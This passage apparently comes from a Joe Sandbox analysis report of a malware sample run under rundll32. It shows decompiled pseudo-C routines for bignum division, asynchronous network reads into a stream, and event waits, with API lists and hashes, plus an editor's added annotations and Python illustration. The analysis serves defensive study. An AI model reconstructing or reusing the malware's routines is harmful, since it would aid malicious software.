                                                  					_t97 = _t96 - _t81; /* 32 - bit count of the top divisor limb: the normalization shift */
                                                  					_v12 = _t96 - _t81;
                                                  					E04B3968F(_t79,  &_v236);
                                                  					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E04B38967(_t101,  &_v236, _a8, _t96 - _t81); /* dividend (_a8, _t101 limbs) shifted into _v236; divisor (_a12, _t79 limbs) into _v92 (likely) */
                                                  					E04B38967(_t79,  &_v92, _a12, _t97);
                                                  					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c)); /* _v8: top limb of the normalized divisor */
                                                  					_t66 = E04B3968F(_t101, 0x4b3d1b0); /* clear the quotient buffer at 0x4b3d1b0 */
                                                  					_t103 = _t101 - _t79;
                                                  					_a8 = _t103;
                                                  					if(_t103 < 0) {
                                                  						L17:
                                                  						E04B3968F(_a16, _a4); /* clear the output, then shift the normalized remainder in _v236 back into _a4 (likely) */
                                                  						E04B31D6C(_t79,  &_v236, _a4, _t97);
                                                  						memset( &_v236, 0, 0x8c); /* scrub both stack temporaries (0x8c and 0x44 bytes) before returning */
                                                  						_t55 = memset( &_v92, 0, 0x44);
                                                  						goto L18;
                                                  					}
                                                  					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
                                                  					do {
                                                  						if(_v8 != 0xffffffff) {
                                                  							_push(1);
                                                  							_push(0);
                                                  							_push(0);
                                                  							_push( *_t99);
                                                  							L04B3B0C8(); /* _allmul (ref 04B310C4): (*_t99) * 2^32, the current top limb moved into the high half of a 64-bit value */
                                                  							_t74 = _t66 +  *(_t99 - 4); /* add the next-lower limb with carry: a 64-bit window of (top limb, next limb) */
                                                  							asm("adc edx, esi");
                                                  							_push(0);
                                                  							_push(_v8 + 1);
                                                  							_push(_t92);
                                                  							_push(_t74);
                                                  							L04B3B0C2(); /* _aulldiv (ref 04B310DA): window / (top divisor limb + 1); dividing by top + 1 keeps the estimate at or below the true quotient digit */
                                                  							if(_t92 > 0 || _t74 > 0xffffffff) {
                                                  								_t74 = _t74 | 0xffffffff; /* estimate does not fit in 32 bits: clamp to 0xffffffff */
                                                  								_v16 = _v16 & 0x00000000;
                                                  							}
                                                  						} else {
                                                  							_t74 =  *_t99;
                                                  						}
                                                  						_t106 = _t107 + _a8 * 4 - 0xe8;
                                                  						_a12 = _t74;
                                                  						_t76 = E04B31FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
                                                  						/* multiply-subtract of estimate * divisor from the dividend window, then correction: while the
                                                  						   window is still >= the divisor (E04B38B62, likely a compare), bump the digit (_a12) and
                                                  						   subtract the divisor once more (E04B39100, likely). The estimate only undershoots, so the
                                                  						   correction is upward only. */
                                                  						while(1) {
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							L13:
                                                  							_t92 =  &_v92;
                                                  							if(E04B38B62(_t79, _t92, _t106) < 0) {
                                                  								break;
                                                  							}
                                                  							L14:
                                                  							_a12 = _a12 + 1;
                                                  							_t76 = E04B39100(_t79,  &_v92, _t106, _t106);
                                                  							 *_t99 =  *_t99 - _t76;
                                                  							if( *_t99 != 0) {
                                                  								goto L14;
                                                  							}
                                                  							goto L13;
                                                  						}
                                                  						_a8 = _a8 - 1;
                                                  						_t66 = _a12;
                                                  						_t99 = _t99 - 4;
                                                  						 *(0x4b3d1b0 + _a8 * 4) = _t66; /* quotient limb stored into the global buffer at 0x4b3d1b0 */
                                                  					} while (_a8 >= 0);
                                                  					_t97 = _v12;
                                                  					goto L17;
                                                  				}
                                                  				/* count the significant bits of the top divisor limb, at most 0x20 */
                                                  				while(_t81 < _t96) {
                                                  					_t81 = _t81 + 1;
                                                  					_t56 = _t56 >> 1;
                                                  					if(_t56 != 0) {
                                                  						continue;
                                                  					}
                                                  					goto L4;
                                                  				}
                                                  				goto L4;
                                                  			}

                                                  Address column for E04B31017 (0x04b3101a .. 0x04b31196): the per-line side-by-side layout was lost in extraction.

                                                  APIs
                                                  • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 04B310C4
                                                  • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 04B310DA
                                                  • memset.NTDLL ref: 04B3117A
                                                  • memset.NTDLL ref: 04B3118A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: memset$_allmul_aulldiv
                                                  • String ID:
                                                  • API String ID: 3041852380-0
                                                  • Opcode ID: 732d570e990842cd061855bffca09ff9b3fac2f9eae35099e7d1462760e3b7b8
                                                  • Instruction ID: 024fa45bd0d960c49c0abe32e841fdd042e2e63d904ac745875e18fce13ec9a4
                                                  • Opcode Fuzzy Hash: 732d570e990842cd061855bffca09ff9b3fac2f9eae35099e7d1462760e3b7b8
                                                  • Instruction Fuzzy Hash: E741B571A00259AFEB10DFAEDC80BEE7779EF44315F1085A9F915AB280DB70BD548B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%
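The control flow of E04B31017 above (a 0x20-bounded bit count on the top divisor limb, a 64-bit window built with _allmul plus an add-with-carry, an _aulldiv by the top limb plus one, a clamp to 0xffffffff, then a loop that bumps the digit while the remainder still holds the divisor) is the shape of limb-wise long division with an under-estimated quotient digit. The Python below is an added illustration of that algorithm written for this page; it is not code from the sample, from Joe Sandbox, or from any Ursnif analysis. The function names are the editor's own, and the reading of E04B38B62 as a compare and E04B39100 as a subtract is an assumption.

```python
"""Limb-wise long division with an under-estimated quotient digit.

Added illustration for this report (editor's code, not the sample's). It
mirrors the shape of E04B31017: bit count of the top divisor limb, 64-bit
window, divide by (top limb + 1), clamp, then correct the digit upward.
"""

LIMB_BITS = 32
LIMB_MASK = (1 << LIMB_BITS) - 1


def to_limbs(value, count):
    """Split `value` into `count` little-endian 32-bit limbs (truncating on overflow)."""
    limbs = []
    for _ in range(count):
        limbs.append(value & LIMB_MASK)
        value >>= LIMB_BITS
    return limbs


def from_limbs(limbs):
    """Inverse of to_limbs."""
    value = 0
    for limb in reversed(limbs):
        value = (value << LIMB_BITS) | limb
    return value


def significant_bits(limb):
    """The 0x20-bounded loop in the decompiled routine: shift the top limb
    right until it is zero and count the steps."""
    count = 0
    while count < LIMB_BITS and limb:
        limb >>= 1
        count += 1
    return count


def long_divide(dividend, divisor):
    """Return (quotient, remainder) for non-negative ints using 32-bit limbs."""
    if divisor <= 0 or dividend < 0:
        raise ValueError("operands must be non-negative and divisor non-zero")
    if dividend < divisor:
        return 0, dividend

    n = (divisor.bit_length() + LIMB_BITS - 1) // LIMB_BITS   # divisor limbs
    m = (dividend.bit_length() + LIMB_BITS - 1) // LIMB_BITS  # dividend limbs

    # Normalize: shift both operands so the top divisor limb has its high bit set.
    shift = LIMB_BITS - significant_bits(to_limbs(divisor, n)[-1])
    v = to_limbs(divisor << shift, n)
    u = to_limbs(dividend << shift, m + 1)   # one spare limb for the shifted-in bits
    v_value = from_limbs(v)
    v_top = v[-1]
    quotient = [0] * (m - n + 1)

    for j in range(m - n, -1, -1):
        # 64-bit window (u[j+n] << 32) | u[j+n-1]: the _allmul / add-with-carry pair.
        window = (u[j + n] << LIMB_BITS) | u[j + n - 1]
        # Divide by (top limb + 1), as the _aulldiv call does: never overshoots the true digit.
        qhat = window // (v_top + 1)
        if qhat > LIMB_MASK:          # the "or eax, -1" clamp
            qhat = LIMB_MASK
        # Multiply-subtract the estimate from the (n + 1)-limb window.
        remaining = from_limbs(u[j:j + n + 1]) - qhat * v_value
        assert remaining >= 0         # holds because qhat <= the true digit
        # Correct upward while one more divisor still fits (compare, bump, subtract).
        while remaining >= v_value:
            qhat += 1
            remaining -= v_value
        u[j:j + n + 1] = to_limbs(remaining, n + 1)
        quotient[j] = qhat

    # Undo the normalization shift on what is left of the dividend.
    return from_limbs(quotient), from_limbs(u) >> shift
```

When triaging a stripped bignum routine, the tell-tale pair is the division by (top limb + 1) followed by an upward-only correction loop; schoolbook implementations that estimate with the top limb alone instead correct downward, and that difference is visible in the decompiled control flow without resolving any of the helper calls.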

                                                  APIs
                                                  • lstrlen.KERNEL32(?,00000008,75144D40), ref: 04B3A9BD
                                                    • Part of subcall function 04B32049: RtlAllocateHeap.NTDLL(00000000,00000000,04B37E50), ref: 04B32055
                                                  • ResetEvent.KERNEL32(?), ref: 04B3AA31
                                                  • GetLastError.KERNEL32 ref: 04B3AA54
                                                  • GetLastError.KERNEL32 ref: 04B3AAFF
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
                                                  • Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
                                                  • Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                  • String ID:
                                                  • API String ID: 943265810-0
                                                  • Opcode ID: 8973fdcd4ed5a3627b9488ac42d55bde662da2184ed7900937add47192cee126
                                                  • Instruction ID: 58a6803347cb15a365dd608466876811e8fd3b80fb71b71a443ce72d1ecf4466
                                                  • Opcode Fuzzy Hash: 8973fdcd4ed5a3627b9488ac42d55bde662da2184ed7900937add47192cee126
                                                  • Instruction Fuzzy Hash: FD418E72500604BBDB219FA7CC88E6F7BBDEB49706F10495AF182E2090E771AD55CB30
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 39%
                                                  			E04B339BF(void* __eax, void* __ecx) {
                                                  				char _v8;
                                                  				void* _v12;
                                                  				intOrPtr _v16;
                                                  				char _v20;
                                                  				void* __esi;
                                                  				intOrPtr _t36;
                                                  				intOrPtr* _t37;
                                                  				intOrPtr* _t39;
                                                  				void* _t53;
                                                  				long _t58;
                                                  				void* _t59;
                                                  
                                                  				_t53 = __ecx;
                                                  				_t59 = __eax;
                                                  				_t58 = 0;
                                                  				ResetEvent( *(__eax + 0x1c)); /* +0x1c: completion event, reset before every read and waited on when a read goes asynchronous */
                                                  				_push( &_v8);
                                                  				_push(4);
                                                  				_push( &_v20);
                                                  				_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  				if( *0x4b3d134() != 0) { /* indirect call (handle at +0x18, buffer, 4, &bytes_read): the argument shape and the 0x3e5 handling below match an InternetReadFile-style asynchronous read; the report does not resolve the pointer */
                                                  					L5:
                                                  					if(_v8 == 0) {
                                                  						 *((intOrPtr*)(_t59 + 0x30)) = 0;
                                                  						L21:
                                                  						return _t58;
                                                  					}
                                                  					 *0x4b3d168(0, 1,  &_v12); /* indirect call (NULL, TRUE, &_v12): matches CreateStreamOnHGlobal(NULL, fDeleteOnRelease, &pStream), and the vtable slots used on _v12 below (0x10 = IStream::Write, 8 = Release) fit that reading. The decompiler lost the return-value test, hence the constant "0 != 0" */
                                                  					if(0 != 0) {
                                                  						_t58 = 8;
                                                  						goto L21;
                                                  					}
                                                  					_t36 = E04B32049(0x1000); /* 0x1000-byte read buffer; E04B32049 wraps RtlAllocateHeap per the report's subcall note */
                                                  					_v16 = _t36;
                                                  					if(_t36 == 0) {
                                                  						_t58 = 8;
                                                  						L18:
                                                  						_t37 = _v12;
                                                  						 *((intOrPtr*)( *_t37 + 8))(_t37); /* vtable slot 8: IUnknown::Release on the stream */
                                                  						goto L21;
                                                  					}
                                                  					_push(0);
                                                  					_push(_v8);
                                                  					_push( &_v20);
                                                  					while(1) {
                                                  						_t39 = _v12;
                                                  						_t56 =  *_t39;
                                                  						 *((intOrPtr*)( *_t39 + 0x10))(_t39); /* vtable slot 0x10 on IStream is Write(pv, cb, pcbWritten): the three pushes above (buffer, byte count, NULL) are its arguments; the 4-byte prefix first, then each 0x1000-byte chunk */
                                                  						ResetEvent( *(_t59 + 0x1c));
                                                  						_push( &_v8);
                                                  						_push(0x1000);
                                                  						_push(_v16);
                                                  						_push( *((intOrPtr*)(_t59 + 0x18)));
                                                  						if( *0x4b3d134() != 0) {
                                                  							goto L13;
                                                  						}
                                                  						_t58 = GetLastError();
                                                  						if(_t58 != 0x3e5) { /* 0x3e5 == ERROR_IO_PENDING: the read completes asynchronously */
                                                  							L15:
                                                  							E04B39039(_v16); /* free the read buffer (E04B39039 wraps HeapFree per the report); on clean completion hand the filled stream to E04B37A07 */
                                                  							if(_t58 == 0) {
                                                  								_t58 = E04B37A07(_v12, _t59);
                                                  							}
                                                  							goto L18;
                                                  						}
                                                  						_t58 = E04B31C47( *(_t59 + 0x1c), _t56, 0xffffffff); /* wait on the completion event with an infinite timeout (E04B31C47, likely a wait wrapper) */
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						_t58 =  *((intOrPtr*)(_t59 + 0x28)); /* +0x28: status recorded when the pending read completed (likely) */
                                                  						if(_t58 != 0) {
                                                  							goto L15;
                                                  						}
                                                  						L13:
                                                  						_t58 = 0;
                                                  						if(_v8 == 0) {
                                                  							goto L15;
                                                  						}
                                                  						_push(0);
                                                  						_push(_v8);
                                                  						_push(_v16);
                                                  					}
                                                  				}
                                                  				_t58 = GetLastError();
                                                  				if(_t58 != 0x3e5) { /* ERROR_IO_PENDING on the initial 4-byte read: same event wait as inside the loop */
                                                  					L4:
                                                  					if(_t58 != 0) {
                                                  						goto L21;
                                                  					}
                                                  					goto L5;
                                                  				}
                                                  				_t58 = E04B31C47( *(_t59 + 0x1c), _t53, 0xffffffff);
                                                  				if(_t58 != 0) {
                                                  					goto L21;
                                                  				}
                                                  				_t58 =  *((intOrPtr*)(_t59 + 0x28));
                                                  				goto L4;
                                                  			}

Instruction addresses, one per line of the C-code body above (0x00000000 where no instruction maps to the line):
0x04b339bf 0x04b339ce 0x04b339d3 0x04b339d5 0x04b339da 0x04b339db 0x04b339e0 0x04b339e1
0x04b339ec 0x04b33a1d 0x04b33a22 0x04b33ae5 0x04b33ae8 0x04b33aee 0x04b33aee 0x04b33a2f
0x04b33a37 0x04b33ae2 0x00000000 0x04b33ae2 0x04b33a42 0x04b33a49 0x04b33a4c 0x04b33ad4
0x04b33ad5 0x04b33ad5 0x04b33adb 0x00000000 0x04b33adb 0x04b33a52 0x04b33a54 0x04b33a5a
0x04b33a5b 0x04b33a5b 0x04b33a5e 0x04b33a61 0x04b33a67 0x04b33a6c 0x04b33a6d 0x04b33a72
0x04b33a75 0x04b33a80 0x00000000 0x00000000 0x04b33a88 0x04b33a90 0x04b33ab9 0x04b33abc
0x04b33ac3 0x04b33ace 0x04b33ace 0x00000000 0x04b33ac3 0x04b33a9c 0x04b33aa0 0x00000000
0x00000000 0x04b33aa2 0x04b33aa7 0x00000000 0x00000000 0x04b33aa9 0x04b33aa9 0x04b33aae
0x00000000 0x00000000 0x04b33ab0 0x04b33ab1 0x04b33ab4 0x04b33ab4 0x04b33a5b 0x04b339f4
0x04b339fc 0x04b33a15 0x04b33a17 0x00000000 0x00000000 0x00000000 0x04b33a17 0x04b33a08
0x04b33a0c 0x00000000 0x00000000 0x04b33a12 0x00000000

                                                  APIs
                                                  • ResetEvent.KERNEL32(?), ref: 04B339D5
                                                  • GetLastError.KERNEL32 ref: 04B339EE
                                                    • Part of subcall function 04B31C47: WaitForMultipleObjects.KERNEL32(00000002,04B3AA72,00000000,04B3AA72,?,?,?,04B3AA72,0000EA60), ref: 04B31C62
                                                  • ResetEvent.KERNEL32(?), ref: 04B33A67
                                                  • GetLastError.KERNEL32 ref: 04B33A82
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorEventLastReset$MultipleObjectsWait
                                                  • String ID:
                                                  • API String ID: 2394032930-0
                                                  • Opcode ID: 446a5626bea40a3fe5f9b24b811d02c819c0db2868b637e07b47adb9df4a835a
                                                  • Instruction ID: f1a58026fd1676e1f173222f787651733a509c3909ee71eecc558b519ab1aad0
                                                  • Opcode Fuzzy Hash: 446a5626bea40a3fe5f9b24b811d02c819c0db2868b637e07b47adb9df4a835a
                                                  • Instruction Fuzzy Hash: 4831C532A00604ABDB21DFAACC44E6F77F9EF84762F1005A9E955E7190EB30F946DB10
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 87%
                                                  			E04B342EA(signed int _a4, signed int* _a8) {
                                                  				void* __ecx;
                                                  				void* __edi;
                                                  				signed int _t6;
                                                  				intOrPtr _t8;
                                                  				intOrPtr _t12;
                                                  				short* _t19;
                                                  				void* _t25;
                                                  				void* _t26;
                                                  				signed int* _t28;
                                                  				CHAR* _t30;
                                                  				long _t31;
                                                  				intOrPtr* _t32;
                                                  
                                                  				_t6 =  *0x4b3d270; // 0xd448b889
                                                  				_t32 = _a4;
                                                  				_a4 = _t6 ^ 0x109a6410;
                                                  				_t8 =  *0x4b3d27c; // 0x1fba5a8
                                                  				_t3 = _t8 + 0x4b3e862; // 0x61636f4c
                                                  				_t25 = 0;
                                                  				_t30 = E04B37A9A(_t3, 1);
                                                  				if(_t30 != 0) {
                                                  					_t25 = CreateEventA(0x4b3d2a8, 1, 0, _t30);
                                                  					E04B39039(_t30);
                                                  				}
                                                  				_t12 =  *0x4b3d25c; // 0x4000000a
                                                  				if(_t12 <= 5 || _t12 == 6 && _t12 >= 2 ||  *_t32 == 0 || E04B3757F() != 0) {
                                                  					L12:
                                                  					_t28 = _a8;
                                                  					if(_t28 != 0) {
                                                  						 *_t28 =  *_t28 | 0x00000001;
                                                  					}
                                                  					_t31 = E04B3205E(_t32, _t26);
                                                  					if(_t31 == 0 && _t25 != 0) {
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  					}
                                                  					if(_t28 != 0 && _t31 != 0) {
                                                  						 *_t28 =  *_t28 & 0xfffffffe;
                                                  					}
                                                  					goto L20;
                                                  				} else {
                                                  					_t19 =  *0x4b3d0f0( *_t32, 0x20);
                                                  					if(_t19 != 0) {
                                                  						 *_t19 = 0;
                                                  						_t19 = _t19 + 2;
                                                  					}
                                                  					_t31 = E04B3A501(0,  *_t32, _t19, 0);
                                                  					if(_t31 == 0) {
                                                  						if(_t25 == 0) {
                                                  							L22:
                                                  							return _t31;
                                                  						}
                                                  						_t31 = WaitForSingleObject(_t25, 0x4e20);
                                                  						if(_t31 == 0) {
                                                  							L20:
                                                  							if(_t25 != 0) {
                                                  								CloseHandle(_t25);
                                                  							}
                                                  							goto L22;
                                                  						}
                                                  					}
                                                  					goto L12;
                                                  				}
                                                  			}


Instruction addresses, one per line of the C-code body above (0x00000000 where no instruction maps to the line):
0x04b342eb 0x04b342f2 0x04b342fc 0x04b34300 0x04b34306 0x04b34315 0x04b3431c 0x04b34320
0x04b34332 0x04b34334 0x04b34334 0x04b34339 0x04b34340 0x04b34395 0x04b34395 0x04b3439b
0x04b3439d 0x04b3439d 0x04b343a7 0x04b343ab 0x04b343bd 0x04b343bd 0x04b343c1 0x04b343c7
0x04b343c7 0x00000000 0x04b34359 0x04b3435e 0x04b34366 0x04b34368 0x04b3436c 0x04b3436c
0x04b34379 0x04b3437d 0x04b34381 0x04b343d6 0x04b343dc 0x04b343dc 0x04b3438f 0x04b34393
0x04b343ca 0x04b343cc 0x04b343cf 0x04b343cf 0x00000000 0x04b343cc 0x04b34393 0x00000000
0x04b3437d

                                                  APIs
                                                    • Part of subcall function 04B37A9A: lstrlen.KERNEL32(04B323E9,00000000,00000000,00000027,00000005,00000000,00000000,04B396DA,74666F53,00000000,04B323E9,04B3D00C,?,04B323E9), ref: 04B37AD0
                                                    • Part of subcall function 04B37A9A: lstrcpy.KERNEL32(00000000,00000000), ref: 04B37AF4
                                                    • Part of subcall function 04B37A9A: lstrcat.KERNEL32(00000000,00000000), ref: 04B37AFC
                                                  • CreateEventA.KERNEL32(04B3D2A8,00000001,00000000,00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?), ref: 04B3432B
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,04B33CA0,00000000,00000000,?,00000000,?,04B33CA0,?,00000001,?,?,?,?,04B36880), ref: 04B34389
                                                  • WaitForSingleObject.KERNEL32(00000000,00004E20,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?), ref: 04B343B7
                                                  • CloseHandle.KERNEL32(00000000,61636F4C,00000001,00000000,00000001,?,00000000,?,04B33CA0,?,00000001,?,?,?,?,04B36880), ref: 04B343CF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ObjectSingleWait$CloseCreateEventFreeHandleHeaplstrcatlstrcpylstrlen
                                                  • String ID:
                                                  • API String ID: 73268831-0
                                                  • Opcode ID: 985c689e3e4a589d51bc399291083000ab714a773a19bf8cb07df108bbf8479e
                                                  • Instruction ID: 07eff6a3b84e1a3b9802467b77bad9ae703d3e181cd624409b5a31c6b730da39
                                                  • Opcode Fuzzy Hash: 985c689e3e4a589d51bc399291083000ab714a773a19bf8cb07df108bbf8479e
                                                  • Instruction Fuzzy Hash: 0B21E132500251ABD7319FBB9C84B6F77A9EF88B13F1506B6FA51EB140DB75EC0186A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 38%
                                                  			E04B3A0B2(void* __ecx, void* __esi) {
                                                  				char _v8;
                                                  				long _v12;
                                                  				char _v16;
                                                  				long _v20;
                                                  				long _t34;
                                                  				long _t39;
                                                  				long _t42;
                                                  				long _t56;
                                                  				intOrPtr _t58;
                                                  				void* _t59;
                                                  				intOrPtr* _t60;
                                                  				void* _t61;
                                                  
                                                  				_t61 = __esi;
                                                  				_t59 = __ecx;
                                                  				_t60 =  *0x4b3d144; // 0x4b3ad81
                                                  				 *((intOrPtr*)(__esi + 0x2c)) = 0;
                                                  				do {
                                                  					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
                                                  					_v20 = _t34;
                                                  					if(_t34 != 0) {
                                                  						L3:
                                                  						_push( &_v16);
                                                  						_push( &_v8);
                                                  						_push(_t61 + 0x2c);
                                                  						_push(0x20000013);
                                                  						_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  						_v8 = 4;
                                                  						_v16 = 0;
                                                  						if( *_t60() == 0) {
                                                  							_t39 = GetLastError();
                                                  							_v12 = _t39;
                                                  							if(_v20 == 0 || _t39 != 0x2ef3) {
                                                  								L15:
                                                  								return _v12;
                                                  							} else {
                                                  								goto L11;
                                                  							}
                                                  						}
                                                  						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
                                                  							goto L11;
                                                  						} else {
                                                  							_v16 = 0;
                                                  							_v8 = 0;
                                                  							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
                                                  							_t58 = E04B32049(_v8 + 1);
                                                  							if(_t58 == 0) {
                                                  								_v12 = 8;
                                                  							} else {
                                                  								_push( &_v16);
                                                  								_push( &_v8);
                                                  								_push(_t58);
                                                  								_push(0x16);
                                                  								_push( *((intOrPtr*)(_t61 + 0x18)));
                                                  								if( *_t60() == 0) {
                                                  									E04B39039(_t58);
                                                  									_v12 = GetLastError();
                                                  								} else {
                                                  									 *((char*)(_t58 + _v8)) = 0;
                                                  									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
                                                  								}
                                                  							}
                                                  							goto L15;
                                                  						}
                                                  					}
                                                  					SetEvent( *(_t61 + 0x1c));
                                                  					_t56 =  *((intOrPtr*)(_t61 + 0x28));
                                                  					_v12 = _t56;
                                                  					if(_t56 != 0) {
                                                  						goto L15;
                                                  					}
                                                  					goto L3;
                                                  					L11:
                                                  					_t42 = E04B31C47( *(_t61 + 0x1c), _t59, 0xea60);
                                                  					_v12 = _t42;
                                                  				} while (_t42 == 0);
                                                  				goto L15;
                                                  			}


Instruction addresses, one per line of the C-code body above (0x00000000 where no instruction maps to the line):
0x04b3a0b2 0x04b3a0b2 0x04b3a0bc 0x04b3a0c2 0x04b3a0c5 0x04b3a0c9 0x04b3a0d1 0x04b3a0d4
0x04b3a0ed 0x04b3a0f0 0x04b3a0f4 0x04b3a0f8 0x04b3a0f9 0x04b3a0fe 0x04b3a101 0x04b3a108
0x04b3a10f 0x04b3a162 0x04b3a16b 0x04b3a16e 0x04b3a1a9 0x04b3a1af 0x00000000 0x00000000
0x00000000 0x04b3a16e 0x04b3a115 0x00000000 0x04b3a11c 0x04b3a12a 0x04b3a12d 0x04b3a130
0x04b3a13c 0x04b3a140 0x04b3a1a2 0x04b3a142 0x04b3a145 0x04b3a149 0x04b3a14a 0x04b3a14b
0x04b3a14d 0x04b3a154 0x04b3a192 0x04b3a19d 0x04b3a156 0x04b3a159 0x04b3a15d 0x04b3a15d
0x04b3a154 0x00000000 0x04b3a140 0x04b3a115 0x04b3a0d9 0x04b3a0df 0x04b3a0e4 0x04b3a0e7
0x00000000 0x00000000 0x00000000 0x04b3a177 0x04b3a17f 0x04b3a186 0x04b3a186 0x00000000

                                                  APIs
                                                  • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,751881D0), ref: 04B3A0C9
                                                  • SetEvent.KERNEL32(?), ref: 04B3A0D9
                                                  • GetLastError.KERNEL32 ref: 04B3A162
                                                    • Part of subcall function 04B31C47: WaitForMultipleObjects.KERNEL32(00000002,04B3AA72,00000000,04B3AA72,?,?,?,04B3AA72,0000EA60), ref: 04B31C62
                                                    • Part of subcall function 04B39039: HeapFree.KERNEL32(00000000,00000000,04B37F18,00000000,?,?,00000000), ref: 04B39045
                                                  • GetLastError.KERNEL32(00000000), ref: 04B3A197
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.332233488.0000000004B31000.00000020.00020000.sdmp, Offset: 04B30000, based on PE: true
• Associated: 0000000A.00000002.332220331.0000000004B30000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332265347.0000000004B3C000.00000002.00020000.sdmp
• Associated: 0000000A.00000002.332273904.0000000004B3D000.00000004.00020000.sdmp
• Associated: 0000000A.00000002.332292678.0000000004B3F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_4b30000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                  • String ID:
                                                  • API String ID: 602384898-0
                                                  • Opcode ID: 0b182b20d505355d82d0a363234248b9784f7d47cda3517603db9ba9d035c0cd
                                                  • Instruction ID: 11ee154e30b684032079f6882be6a132f91a021b171e6f0932a804a6c7c628d3
                                                  • Opcode Fuzzy Hash: 0b182b20d505355d82d0a363234248b9784f7d47cda3517603db9ba9d035c0cd
                                                  • Instruction Fuzzy Hash: 923120B5900708EFEB21DFE6D8C099EBBB8EF09341F2045AAE542E2140D775EE549F60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 40%
                                                  			E04B33BF1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
                                                  				intOrPtr _v12;
                                                  				void* _v16;
                                                  				void* _v28;
                                                  				char _v32;
                                                  				void* __esi;
                                                  				void* _t29;
                                                  				void* _t38;
                                                  				signed int* _t39;
                                                  				void* _t40;
                                                  
                                                  				_t36 = __ecx;
                                                  				_v32 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_v12 = _a4;
                                                  				_t38 = E04B39763(__ecx,  &_v32);
                                                  				if(_t38 != 0) {
                                                  					L12:
                                                  					_t39 = _a8;
                                                  					L13:
                                                  					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
